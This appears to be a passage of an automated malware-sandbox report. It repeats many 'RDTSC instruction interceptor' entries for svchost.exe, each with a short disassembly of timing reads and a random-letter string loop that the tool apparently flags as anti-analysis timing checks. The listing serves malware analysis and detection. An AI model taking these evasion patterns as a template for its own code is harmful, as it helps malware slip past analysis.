Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA590F3h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59513h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59544h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FBB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59550h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA590F3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA590F3h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59113h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59544h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F876h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FF96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59130h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
